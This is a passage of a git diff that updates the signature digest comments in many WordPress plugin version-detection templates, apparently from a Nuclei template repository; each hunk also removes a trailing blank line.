a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 84f5b60d3d..b2bf642c36 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402206e04862a7ebabaa9d9ad5d05221148776a8982c797705647698aa3c3574562e002207e39423423e800815c05aeaa25d3a2430b45ab623b8f4afac57ae388f9d436e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bf31b208a7d97575ac3ec176a9a0c75b7ffaf869aa53c5312da1051250973047022100b2412945b3e8778e44fac9cc4a8220b56138b85dbd72db9fe7bdaffeaad999f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index afe9c72639..3d537b4fb9 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220065d068bde6fbdf93a817d20b6aadc9413c7617f102a2c7861f406f69b0c0b9202205aecae37992d2493f880b04f1329b543f62ae889736950b7170f7e76dc34c024:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d22176e3c0a881e626c9209fc1528b4186a147355f3568c9f755255c456b08d402210087b4092dfbafedeaacaf762d5283dc7d813cd27ee62c289f94133193a3ed4395:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 27f6ac7874..91edc5edd5 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100e00b3df1cddee0f34510ce413c59b81e4b044ea934c40cbb605127a851a6995902207a1356aa3ffa15ab6f83617e19db94ac3f5f53af32edc04162bdd5b9e9429443:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203f26615d2c83f0861dc5b9d8db738dd554d4a9a780a0807e26c0f0d6fc3a36cc0220321513e3161c23ea8eb6d3a26196bd8f14dfd1438690e017f24103bc9af0d8ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 0326ccecfd..c29c5b8d55 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502202f5a7d2093db309cc99ad4be6ee0e818bf6709de0c5c0e275efb00298d600be1022100c0efd5cd5bf05cd9b646c42fb8af3ed3d82b5aa195e53d576e8786e2b2fcd665:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009bb6cf456ee690b31a5774fcdb09db404307f18f42a4c64edee5bf90e3c4e0230220278423ff0a77b2ad3cd6ff76b58283dfcf99337095cde15f1787b78cfc920a78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index 4b9f23d674..84851ef046 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220428f69f7d601657718a59c3c5964762cd417a67d08d4deeb445983b1dedb149f022100d4cc0ccd6ee29779f4897a82543a89b5ab9311351eab2214aa0918fbd86db0ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022018676fca78c040d560ba8070ca11fe2cafbc6f7c9377d910e20ddab704306040022041559de5056bd2d01b03c8ec339be437c04e168022d9cbbc82a125b61cb1ead7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 1dc4e045dd..c5767897eb 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022011dae129819538f189e8608f2f48f7f891e0bb0f2a90ad586b50925df391dc2702210084216a9d6acf15886e714668369eb2b2c0eacfeea65afaa17140e14a74934633:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220544e1bb18aa012c9fa84bb48bf84c186e3e15f806cb5d4ae8aaa80b86bfb6cf702206233be9305fe87ecea07306458770caef64111b21c3e074eb717509477a2b705:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 344e98341f..d9c62eca34 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502204300fc1a3722917c8da9a3c31f4221e8c175d51f920c2a6554ff0759d4719623022100a0b6c703620c39fb93a98ebd379dd91ee54dfd7d7b3aae598fdda90292838b3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207bcf7a9964f0825d35389490dc357dc89c0820321f43f70cd7b6dfcfd741ef260221009be93343c50efd39895e1a3377d06a332dd489d54f98e869569ad30ef65aa625:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 495ff26a5b..14b6a946e3 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022007f736cfbb779bf3e790047bbe1157d588ffcd254d314adcda64ed93889bdf94022100ba8b398a66aa37243e10142aa5421e60ccc2aaf4a194fba169eb72f952a88ae3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ad01207f6983cef0fd45cd0e8f3a77f4aa886b832feaed0a2d547554d58f35d1022100b061fe154f6e23a818b9b0ef557b1630ae9bc118ebfb2f7b7d378a0c0998ecd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 4d36b1574e..387da49c25 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402200f57467589aad55a74cfae205b4f0e577d8c734f0ba81905662b98b836c6e74002207a59be04aedc168b468535daca544646b97f1ff905c048eb697a43886cb0cd8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009c69214526a5c6b3385b064cb492e6ec34cc857429b6d9694a8e099c1cc5b34702205a8ff9dada3d1aa5d24aeaa91671f0f5ceb3098613278551b38b6093768a71ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 07b796e3a9..4a08d56ec1 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502200fffe765fa752b1a6c5e2aec461e3a405dcae7e92a77420d601530603a8b0a24022100f856961ae4d105721e0078ed3eda025f4cb46b370d2bc54dd4aa11c17e049ac0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100de0b55b33a7708d0da148d55ebe2b028b987c268ad148ab2f87c1f2a489f5c59022100e2f3bb693c3b122091739b4177080e225ae2b28d63d877317813b993c714c189:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 0c8460aeeb..68e4e8bb22 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220183ab10fad94177e62d899d5f8a8ef59e9fcde827580c5fad07f9f7e181e1a19022100bddf301c004ec845cc542d0a514d61b73ec6dd482aebb3b67d1a9a87b2ed4104:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100970e83ef2e2b65e8554af125a04ca745d2c2c94193335dea3c7bec89da82e2f0022100fecd522c2fe100cd43cd0b64220ba67fd2b2a15ef4de53437bdba55d60224acc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index b0744bbe1f..f41e29fc19 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022003a170193d15733ce3d570aa715767b1f336ecb4a160aae1a1edef6404549313022100c3c0bc7da1cf4a43205d9e9e451ebd70318fd296dbc6436a41d4c6d528dcaa75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022052dcfc2956defb1bb65162f52302bb38441a8819a330aa50bfcf572a668b798302203c19bd7f5e838c50d60bf613b1b0d5c12e44c03455aeee8d773577a51e7546d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 29ab7bdfe8..2ff8d43fe6 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502204fe631e6dd11f21a285d37e2f82bd5d818c2145ed27642410786483ab35a9a26022100f96178d35557d1fae9d2c2822475e94059aafdb3c3a208ac6ef2a781d4925d87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022069fc06111975463514887dc70ed6ed1897cb61474dd6ba44f2f339cd1f08bbb30220175c2c92ccb77cb51afacd00d548e8822dac23b16a97f653c028649dd9e762a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index a1b2f14707..8ac30951d0 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100f949bee598693e0fc0601a8ba9c0151d665e223013a2d0f0422f6be1cfddbab3022100ae41d42574185a2fff6f20d12a68395d8edfaad1bb191e80a05514209a0ea981:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220193d1545b4c0e8904b07e9f5fb59cb5df9b92194f9eb6c055a89097207a9339402204a1dca73e3e49cb42d4848528a64d86eeac2caf7a83c0890fd1d151030567530:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/extendify.yaml b/http/technologies/wordpress/plugins/extendify.yaml index f47563c858..8e181f343f 100644 --- a/http/technologies/wordpress/plugins/extendify.yaml +++ b/http/technologies/wordpress/plugins/extendify.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221008b86fa3ae76b176d8aa6987da738221d5e3ade962093123fae12c83bca3d3a9902202831ddc48d8920ece10ccaf0cf9036e6e4b1f9c16055170b7602defd39bc3755:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022033be677a134b1461ab506cf07eec77051addbce25a10d6400cbf4c806949787a0221008b8d0113d0c79d36aab11072b267d92e2e549ea1e3ac4aabf9a623d676d59fde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index bf841aae64..e175770fcb 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100abc399cc5d0319d5f0822f072d3af1bbaf8cadfe5449d60c5632bd569bc4d0a60221009753769d557882c8d91b65c31cd154f12366ea4690bff137a533e510cf5c3738:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ee873986f046d3565bc94fbe97f082dd349de0e29b2cfea69fb712c0bb97fc00022100fb68f0a7635ba9bd6c7dc0464f6dd3da95e3a67ef6bf1ae8dc591e01bc8c9436:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index f09eab6873..e828d80c78 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220101ada14f39029ee147e347e5a95e729e6d874669d923b1c67fc5123cc621904022044f2257638b76fbef86ad339fef81123fac647e27c46d422c592ca91e67f9242:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022079e48f02aa2bda092238ff20de7b9627005fc200716f1ac7482d5c62d22c8248022021f85b0df89fb55689e29bd9ded075049feab7c9c7089798391ef0559934b7dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 65c10e7421..4df5e96bfe 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100bfec72f8cc047a2a94a36026dc175a5fe0889233599bb16b5af660e6e9f87901022100dd4490e0df91deaab3d0d327a7d145a8d88f1e0e95756ccd6ce0bd2b64a58399:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bcb6961affb028cffdf9ee911ad2311fbb916c7c9bf8936c52d5dfbc27e89c2a022023542fb817104e33d986039ed51832825488035a91901a7480273c92f17807a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluent-smtp.yaml b/http/technologies/wordpress/plugins/fluent-smtp.yaml index 8732427feb..5aab82686a 100644 --- a/http/technologies/wordpress/plugins/fluent-smtp.yaml +++ b/http/technologies/wordpress/plugins/fluent-smtp.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402205fb7f576bc9b61710ba607391a5b62dcc43e0a4f2cfabf4137ac52098d3259fc02205fb04f677dc163c5d667f593e3048ebcf39086a189021b9cbbc7a9e43c3c7b45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207afdb0bd5c26b02cdc16c099aa74ccf9f002a43c7346899dc050f4049ae7e7ef022100dc794ac4534f870aa19fa981e5eef9f46db7a003326dbed77567cb27db992833:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 3cd0868c08..87fdac1444 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402202caa31e5a9d4d6d3d4cff83ef39a04d5b17a87ee8fec503186f6577a1e162bdb02203b430e8fffe408982daafea95af33dddc4f7cdafb0120342381012a4a1c36d13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100962f03a5351bf301d80ae5a0f9b9e01c2ab054da415a44370ad6427f31299f1702205bdc6777df302c7dcbff1a3dcb3494fbc8ee909647f32e78c72480ba4474bc95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index aadaf97b70..c68ff94eac 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402206091815d753085488e5509fa7fb08e1499ae2f9988767f926187a7bb1fc9232c022035082c661032eaa5ad3bdfbcd4ef86ca993d4b9c870f52489d9608204f2c9c90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b61e41eb131eb80b8f9f2de153718c9e0f39e584d4f864be15effe5e6144cdad02202eff2c39b08ae67db5f6b37cdd6bda1b25034f6adccd865c23ab344c19f50416:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 9bb3569207..49c0c2e526 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100c373521828964954939cc558cd8bc3a2f0b0024289ae6cf6010e67061a9612f60220741b014b5fcb8ffcacc8064845730ceb01f23ecfec6c68b7253353ee31debd08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022001169a2c9ce1024062ef19c27009015ed6c1b0c84d021f803a523a78ebfb0df602206166bbeeb43e1a603661af426cf77f45cf70a21679e9a3f9a0cdfbd8152765c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 2cd5ccdb57..fb188ba1c1 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221008ebe45ca25d9b5e1bfa50595f555d183b23822b86afb197965884d56360659d602204d906077448abe9b9229ed7598efb566fb6f035bdd920bf6ff1006a109d329b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008526aafd366670d5b3a8d7b446524142ebf27432a41f6743679233361b362afd022100f4641e9bea4aff89c8857fb1a4d31732a721eaece1495a160621161b1f3ebfc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 2927f11776..06784bc17f 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100f739ad064a62a5cc41c0a24b20b4f6b50591230fc0a782d06142366ca8a0386d02201780d4b6c84ee09c915ac773ee36eb91ce04b3cc9e5ced715851b184717f4753:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f5cdf010eaf352befc68a0b40e34c8b6c912e4ac4aa2a88ae4fd0f8797e8a1100220236654d9a818718bce36d92ee0be2bcfbbbefafe94720013cf8a248fb4346584:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index c6b976be2a..27ad2cd931 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022046b14e79ba3bce9a507a6bfa8bac08f585d40ef07f39bb407b21254fa495bfd502210080ecdb600dd81e591720b4a27e456b435a37af7ea84ec003a17d9dc1bec40d0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cd98debf0aa5171eacf44991611151370c571ff010656f11bff9175e87b15513022100af8cb9c5f4f430dfbb5334f2977f94b4cc814f7dbc83e4a091b9f16c38246ced:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 874e5707d7..af7e4ee9ac 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022048171b830b625ec81dc5d3b4cfa0d76e2f7779866e822d0685c639ecfa97cc42022069ccb4ffc879a3ffb43ae3ed60cb03f004623ac60fd03df77a7a42e22628b7a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205341f5bca0542f6b81762d6f276d8e14c23c85beb745b27ff7bdecc28ed5cb25022060be4b99192e5134039d715b38b9ecbb83c7feaf4afb70c65906ff4954a506b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 7b64f947f7..2c516011a8 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402202c1394b6dfcdec04d0ae6a854b0fea4d10b76ad6e671bad5bd56b36ff656d7b2022057fda143a10e9d812f7391ad8e7f179c827d6b75b3a5c55e5ead879a5e7bd046:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203effd6b077f409a8e01afbe85cb41cac6bb32882c1bc3fef2a30d82fcc0e511002201676f52a9644d327a28a405d8ca5c0d5f94c76105f2e14bc0d7c9025a3c4ee75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 5017496053..b01254e7a0 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100f9eef2c5927a4af716a04a0af2ec5f326680f545d7a767e753c9775285168700022100f6c4f191ff3521daf7dfe55d7908135f924129c3b414dbba49d5b52bf4a64c89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200d428f69bad1972a910ce3a76765f3d59ea6aa9b04de812affdae6b3be30db65022015ba2d72dd8f5f7c84c8f254b477f57d217a099fabd2f91b0cc459ed6d1b6234:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 97d8e5c6e2..ce25127d93 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100f7a9021154d632757bcd393915a435d7581be05483f64e1ceb0839fe4b5c901a022024c7e881fc9dd2d44f3e8d625e05f815f2635e7f98a78cf638d235616e832a7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022046355682fe33e441a98c5378ec89ceb3e174ddd60c71728f9e914672d8d573db022029e9d5d077380edb5b1df83b742d474024716352069e2d6942f7cbf21875f80c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index e49fe2e15e..2986e6f511 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221009181318b2d842444ff3c769c1ee6f94c5da5459db559384ee98cca2f4412f6200220764713b5faae6760b06aae9ec8f0e92d58498d1a6bde974affee5e256bfbbcc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204083f57c7afb9c179fb38d1de35fd110438a5e41fc0d0603a07f3dbd73479e9e022100d26780fa83bfedc3844c32eb9a6ead4d3ae82c7593de840364611d04e0e49121:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 090c1cb665..d4de034b0b 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502203e920bd085a4bb787cf92fbe4f6e81b9dc04e9eeb59d778ad644e44b1a5cf77b0221008385d22e70cbd2949dc1a985b7876f081453dc73737ad472603f42e4e4c58e38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dfeb6d411f10fae4ee5018f965adad42f63be781e66475f3ba67925bc317104e02203e4dcec4accada39c98d53bfb0db3bf17fef409eee108bf0bcb888faed209f4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index a44ba069c9..efdb0e76ca 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502202d29540f6559c7dd6abd71e2016e8fb887bb871908310ff7203a6f9ba607ce4d022100c10d245b44e37b4282666fd97de1ee2d6d57c12d5e7ca4edeb58239b3d9ae7c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210089e76ee15d3071f3c1d701d628c5b0cfc6eadde72412855d8048e745f4a2a612022100fa37d6ce214510d82db368823d989f0219409cb047665547817fb019714408c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index d0f88e7f31..0fe6631434 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022021615511d4ed5e0e157296dc146f82dab27039b616faccef4a940334af4cfddb022100e64b3f6c46ce693dbcc46ce41cb0e4e3d97493b6af9128ea7b5fd3ff90145eb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220609b81e5390de802185e92aa5271ac9d709a9764d778348bcb13e1125083a57e022003caf973eed82aaf27011546364d71cced9b99fad2052d6777daa0f6b170573c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 205d472a7c..b414b48d0d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 